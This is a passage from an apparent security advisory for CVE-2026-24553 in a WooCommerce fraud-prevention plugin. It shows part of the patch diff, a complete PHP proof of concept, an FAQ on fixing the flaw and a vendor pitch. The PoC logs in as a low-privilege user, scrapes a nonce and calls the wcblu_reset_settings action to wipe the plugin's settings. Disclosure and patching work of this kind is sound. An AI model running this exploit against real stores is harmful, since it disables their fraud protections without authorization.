+                update_post_meta( $post_id, 'Address 2', filter_input( INPUT_POST, 'billing_address_2', FILTER_SANITIZE_FULL_SPECIAL_CHARS ) ?? '' );
+                update_post_meta( $post_id, 'State', filter_input( INPUT_POST, 'billing_state', FILTER_SANITIZE_FULL_SPECIAL_CHARS ) ?? '' );
                 update_post_meta( $post_id, 'Attempt', '1' );
                 update_post_meta( $post_id, 'WhereUserBanned', 'Place Order' );
             }
@@ -696,6 +696,29 @@
     }

     /**
+     * Check whether the email exists in blocked users list.
+     *
+     * @param string $email User email.
+     *
+     * @return bool
+     */
+    private function wcbfc_is_blocked_user_email( $email ) {
+        $email = wcblu_safe_trim( sanitize_email( $email ) );
+        if ( empty( $email ) ) {
+            return false;
+        }
+        $cache_key = 'wcbfc_blocked_user_email_' . md5( strtolower( $email ) );
+        $cached = wp_cache_get( $cache_key );
+        if ( false !== $cached ) {
+            return (bool) $cached;
+        }
+        $blocked_user = get_page_by_title( $email, OBJECT, 'blocked_user' );
+        $is_blocked = $blocked_user instanceof WP_Post && 'publish' === $blocked_user->post_status;
+        wp_cache_set( $cache_key, $is_blocked );
+        return $is_blocked;
+    }
+
+    /**
      * @param $email
      *
      * @return string
@@ -816,8 +839,7 @@
                                     $code = $delivery_zone_location_result->code;
                                     $type = $delivery_zone_location_result->type;
                                     if ( !empty( $type ) && 'continent' === $type ) {
-                                        $continents = WC_Countries::get_continents();
-                                        // @phpstan-ignore-line
+                                        $continents = ( function_exists( 'WC' ) && WC() && WC()->countries ? WC()->countries->get_continents() : array() );
                                         $continents_and_ccs = wp_list_pluck( $continents, 'countries' );
                                         if ( is_array( $continents_and_ccs ) ) {
                                             foreach ( $continents_and_ccs as $continent_code => $countries ) {
@@ -1707,6 +1729,63 @@
     }

     /**
+     * Log WooCommerce REST requests and optionally block routes.
+     *
+     * @param mixed           $response Response from a REST request.
+     * @param array           $handler  Route handler.
+     * @param WP_REST_Request $request  REST request object.
+     *
+     * @return mixed
+     */
+    public function wcbfc_block_rest_request( $response, $handler, $request ) {
+        $general_options_raw = get_option( 'wcblu_general_option' );
+        $general_options = ( empty( $general_options_raw ) ? array() : json_decode( $general_options_raw, true ) );
+        $acp_enabled = ( !empty( $general_options['wcbfc_acp_status'] ) ? $general_options['wcbfc_acp_status'] : '0' );
+        $disable_rest_api = ( !empty( $general_options['wcbfc_acp_disable_rest_api'] ) ? $general_options['wcbfc_acp_disable_rest_api'] : '0' );
+        if ( '1' !== $acp_enabled ) {
+            return $response;
+        }
+        $route = $request->get_route();
+        if ( 0 !== strpos( $route, '/wc/' ) ) {
+            return $response;
+        }
+        if ( function_exists( 'wc_get_logger' ) ) {
+            $logger = wc_get_logger();
+            $logger->info( 'REST request: Method = ' . $request->get_method() . ', Route = ' . $route, array(
+                'source' => 'wcblu-rest-blocked-request-log',
+            ) );
+        }
+        $default_blocked_routes = array(( '1' === $disable_rest_api ? '/wc/v3/orders/' : '' ), ( '1' === $disable_rest_api ? '/wc/v3/orders' : '' ));
+        $blocked_routes = apply_filters( 'wcblu_rest_blocked_routes', $default_blocked_routes );
+        foreach ( $blocked_routes as $blocked ) {
+            if ( 0 === strpos( $route, $blocked ) ) {
+                return new WP_Error('rest_forbidden_route', sprintf( __( 'The REST API route "%s" is disabled on this site.', 'woo-blocker-lite-prevent-fake-orders-and-blacklist-fraud-customers' ), esc_html( $route ) ), array(
+                    'status' => 403,
+                ));
+            }
+        }
+        return $response;
+    }
+
+    /**
+     * Get WooCommerce order attribution origin.
+     *
+     * @param WC_Order $order Order object.
+     *
+     * @return string
+     */
+    private function wcbfc_get_order_origin( $order ) {
+        if ( !is_a( $order, 'WC_Order' ) ) {
+            return '';
+        }
+        $origin = $order->get_meta( '_wc_order_attribution_source_type', true );
+        if ( empty( $origin ) ) {
+            $origin = $order->get_created_via();
+        }
+        return ( is_string( $origin ) ? $origin : '' );
+    }
+
+    /**
      * Function to get country by ip (Using wp_remote_post)
      *
      * @param string $ip
--- a/woo-blocker-lite-prevent-fake-orders-and-blacklist-fraud-customers/woocommerce-blocker.php
+++ b/woo-blocker-lite-prevent-fake-orders-and-blacklist-fraud-customers/woocommerce-blocker.php
@@ -16,7 +16,7 @@
  * Plugin Name:       Fraud Prevention For WooCommerce and EDD
  * Plugin URI:        https://www.thedotstore.com/
  * Description:       Prevent fake orders and Blacklist fraud customers allows your WooCommerce store to refuse orders from specific user, based on blacklist rules.
- * Version:           2.3.2
+ * Version:           2.3.3
  * Author:            theDotstore
  * Author URI:        https://www.thedotstore.com/
  * License:           GPL-2.0+
@@ -25,8 +25,8 @@
  * Domain Path:       /languages
  *
  *
- * WP tested up to:      6.9
- * WC tested up to:      10.4.3
+ * WP tested up to:      6.9.1
+ * WC tested up to:      10.5.2
  * WC requires at least: 3.0
  * Requires PHP:         5.6
  * Requires at least:    5.0
@@ -85,7 +85,7 @@
     define( 'WB_PLUGIN_PATH', plugin_dir_path( __FILE__ ) );
 }
 if ( !defined( 'WB_PLUGIN_VERSION' ) ) {
-    define( 'WB_PLUGIN_VERSION', '2.3.2' );
+    define( 'WB_PLUGIN_VERSION', '2.3.3' );
 }
 if ( !defined( 'WB_STORE_URL' ) ) {
     define( 'WB_STORE_URL', 'https://www.thedotstore.com/' );

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-24553 - Fraud Prevention For Woocommerce <= 2.3.2 - Authenticated (Subscriber+) Information Exposure
<?php

$target_url = 'http://target-site.com';
$username = 'subscriber_user';
$password = 'subscriber_pass';

// Step 1: Authenticate and obtain WordPress cookies
$login_url = $target_url . '/wp-login.php';
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => '1'
]));
$response = curl_exec($ch);

// Step 2: Access a plugin admin page to extract the nonce from the localized script
$admin_page_url = $target_url . '/wp-admin/admin.php?page=wcblu-dashboard';
curl_setopt($ch, CURLOPT_URL, $admin_page_url);
curl_setopt($ch, CURLOPT_POST, false);
$response = curl_exec($ch);

// Extract the nonce from the adminajax object in the page source
if (preg_match('/adminajaxs*=s*({[^}]+})/', $response, $matches)) {
    $json = json_decode($matches[1], true);
    $nonce = $json['nonce'] ?? null;
} else {
    // Fallback: try to find the nonce in a script tag
    if (preg_match('/"nonce"s*:s*"([a-f0-9]+)"/', $response, $matches)) {
        $nonce = $matches[1];
    } else {
        die('Could not extract nonce from page source.n');
    }
}

echo "Extracted nonce: $noncen";

// Step 3: Exploit the vulnerable AJAX endpoint
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';
curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
    'action' => 'wcblu_reset_settings',
    'nonce' => $nonce
]));
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

// Step 4: Analyze response
if ($http_code === 200 && trim($response) === '') {
    echo "SUCCESS: Plugin settings reset. The 'wcblu_option' was cleared.n";
    echo "This indicates the vulnerability was successfully exploited.n";
} else {
    echo "Response Code: $http_coden";
    echo "Response Body: $responsen";
    echo "The target may be patched or the nonce invalid.n";
}

?>

Frequently Asked Questions

What is CVE-2026-24553?
Overview of the vulnerability
CVE-2026-24553 is a medium-severity vulnerability affecting the Fraud Prevention For WooCommerce plugin for WordPress, specifically versions up to and including 2.3.2. It allows authenticated users with Subscriber-level access or higher to expose sensitive user or configuration data through an insufficiently protected AJAX endpoint.
Who is affected by this vulnerability?
Identifying vulnerable users
Users of the Fraud Prevention For WooCommerce plugin who are running versions 2.3.2 or earlier are affected. This includes any WordPress installations where authenticated users with Subscriber access can exploit the vulnerability to access sensitive information.
How can I check if my site is vulnerable?
Verifying plugin version
To determine if your site is vulnerable, check the version of the Fraud Prevention For WooCommerce plugin installed on your WordPress site. If it is version 2.3.2 or earlier, your site is at risk and should be updated immediately.
How can I fix this vulnerability?
Updating the plugin
The vulnerability is fixed in version 2.3.3 of the Fraud Prevention For WooCommerce plugin. Updating to this version or later will mitigate the risk associated with CVE-2026-24553.
What does a CVSS score of 4.3 mean?
Understanding the risk level
A CVSS score of 4.3 indicates a medium severity level, suggesting that while the vulnerability is not critical, it poses a significant risk to sites with vulnerable versions. Administrators should prioritize addressing this issue to prevent potential data exposure.
What is the root cause of this vulnerability?
Technical details
The vulnerability is caused by a lack of capability checks in the `wcblu_reset_settings()` function, which allows any authenticated user with a valid nonce to execute a function that can expose sensitive data. The nonce was also accessible to low-privileged users.
How does the proof of concept demonstrate the issue?
Example exploitation
The proof of concept demonstrates how an attacker can authenticate as a Subscriber, extract the nonce from the page source, and then send a crafted request to reset the plugin settings. This showcases the ease with which sensitive information can be exposed.
What data could be exposed if this vulnerability is exploited?
Potential risks
If exploited, attackers may reset the plugin’s configuration, which could disrupt fraud prevention measures and expose sensitive operational data. This could lead to further attacks or the compromise of the WooCommerce store’s security.
What steps can I take to mitigate this vulnerability until I can update?
Temporary measures
While the best mitigation is to update to version 2.3.3, you can temporarily restrict access to the plugin’s admin pages or limit the capabilities of Subscriber-level users until the update is applied.
What should I do if I suspect my site has been compromised?
Response actions
If you suspect that your site has been compromised due to this vulnerability, immediately review your logs for unauthorized access, change passwords for all users, and consider restoring from a backup prior to the exploitation. Conduct a full security audit of your site.
How can I stay informed about future vulnerabilities?
Keeping up-to-date
To stay informed about future vulnerabilities, subscribe to security mailing lists, follow WordPress security blogs, and regularly check the Common Vulnerabilities and Exposures (CVE) database for updates related to your plugins and themes.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations